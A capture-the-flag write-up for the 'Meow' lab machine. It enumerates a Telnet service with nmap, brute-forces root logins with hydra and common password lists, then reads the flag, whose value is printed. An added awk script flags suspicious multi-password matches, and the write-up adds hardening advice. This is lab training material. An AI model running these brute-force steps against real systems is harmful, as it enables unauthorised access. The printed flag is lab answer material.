01.MEOW (TELNET)

OVERVIEW

Target Service:                   Telnet
Attack:                           Brute Force
Vulnerability:                    Authentication Vulnerability – Weak Credentials
MITRE Tactics & Techniques:       TA0001: Initial Access
                                   - T1078: Valid Accounts
                                  TA0006: Credential Access
                                   - T1110.001: Brute Force – Password Guessing

Summary: The target system exposed a Telnet service with no authentication hardening, 
         allowing access via default or easily guessable credentials. A brute-force 
         attempt using common username-password combinations succeeded, revealing a 
         serious authentication misconfiguration.

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ nmap -sV -T4 10.129.201.145 -p-
 PORT     STATE SERVICE       VERSION
 23/tcp   open  telnet        Linux telnetd

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 10.129.201.145 -p 23
 * the -sC option runs the default set of Nmap scripts (NSE scripts), which typically
   include scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln 10.129.201.145 -p 23
 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 23
    - e.g., weak Telnet configurations, or known vulnerabilities in the Telnet 
      service
       - if no results are found then the service may be fully patched, but a clean
         result does not rule out weak credentials or a misconfiguration

FOOTHOLD/COMPROMISE

Submit root flag
#BRUTE FORCE USERNAME & PASSWORD
root@htb:~$ locate username
 /usr/share/seclists/Usernames/top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .

root@htb:~$ locate password
 /usr/share/seclists/Passwords/Common-Credentials/top-passwords-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Passwords/Common-Credentials/top-passwords-shortlist.txt .

root@htb:~$ hydra -L top-usernames-shortlist.txt -P top-passwords-shortlist.txt 10.129.201.145 telnet
 [23][telnet] host: 10.129.201.145   login: root   password: dragon
 [23][telnet] host: 10.129.201.145   login: root   password: querty
 [23][telnet] host: 10.129.201.145   login: root   password: master
 [23][telnet] host: 10.129.201.145   login: root   password: 1234567
 [23][telnet] host: 10.129.201.145   login: root   password: trustno1
 [23][telnet] host: 10.129.201.145   login: root   password: letmein
 [23][telnet] host: 10.129.201.145   login: root   password: 111111
 [23][telnet] host: 10.129.201.145   login: root   password: abc123
 [23][telnet] host: 10.129.201.145   login: root   password: iloveyou
 [23][telnet] host: 10.129.201.145   login: root   password: monkey
 [23][telnet] host: 10.129.201.145   login: root   password: 123456
 [23][telnet] host: 10.129.201.145   login: root   password: 12345678
 [23][telnet] host: 10.129.201.145   login: root   password: password
 [23][telnet] host: 10.129.201.145   login: root   password: sunshine
 [23][telnet] host: 10.129.201.145   login: root   password: baseball
 [23][telnet] host: 10.129.201.145   login: root   password: 123123
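
The hydra run above reports sixteen different passwords as valid for root. They cannot all be the account's password, so the pattern points to the service accepting the login without checking the password, or to the tool misreading the prompt, and should be confirmed by hand. The script below is an added example, not part of the original writeup or of hydra, that flags this pattern in hydra result lines. The function names, the verdict labels and the shortened sample input are assumptions made for illustration.

```bash
#!/usr/bin/env bash
# Added example: triage hydra result lines per service/host/login.
# MULTI-MATCH  = several distinct passwords reported valid for one login,
#                so the password is not what gates access; verify manually.
# SINGLE-MATCH = exactly one password reported valid.

# Constructed sample in hydra result-line format (shortened from the run above,
# plus one constructed line for a second host in a documentation address range).
sample_output() {
cat <<'EOF'
[23][telnet] host: 10.129.201.145   login: root   password: dragon
[23][telnet] host: 10.129.201.145   login: root   password: master
[23][telnet] host: 10.129.201.145   login: root   password: 123456
[22][ssh] host: 192.0.2.10   login: admin   password: admin
EOF
}

# Reads hydra output on stdin and prints, in first-seen order:
#   <verdict> <[port][service]> <host> <login> <distinct-password-count>
triage_hydra() {
  awk '
    /^[ \t]*\[[0-9]+\]\[[a-z0-9-]+\] host: / {
      host = ""; login = ""; pw = ""
      for (i = 2; i <= NF; i++) {
        if ($i == "host:") host = $(i + 1)
        else if ($i == "login:") login = $(i + 1)
        else if ($i == "password:") pw = $(i + 1)   # empty if none printed
      }
      key = $1 " " host " " login
      if (!((key, pw) in seen)) {                   # count each password once
        seen[key, pw] = 1
        if (!(key in n)) order[++m] = key
        n[key]++
      }
    }
    END {
      for (i = 1; i <= m; i++) {
        k = order[i]
        verdict = (n[k] > 1) ? "MULTI-MATCH" : "SINGLE-MATCH"
        print verdict, k, n[k]
      }
    }
  '
}

sample_output | triage_hydra
```

A MULTI-MATCH line is an audit finding in its own right: the account should be given a strong password or disabled for remote login, and Telnet replaced with SSH.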

root@htb:~$ telnet {targetIP/domain}
 Meow login: root

root@Meow:~# ls
 flag.txt  snap

root@Meow:~# cat flag.txt
 b40abdfe23665f766f9c61ecba8a4c19
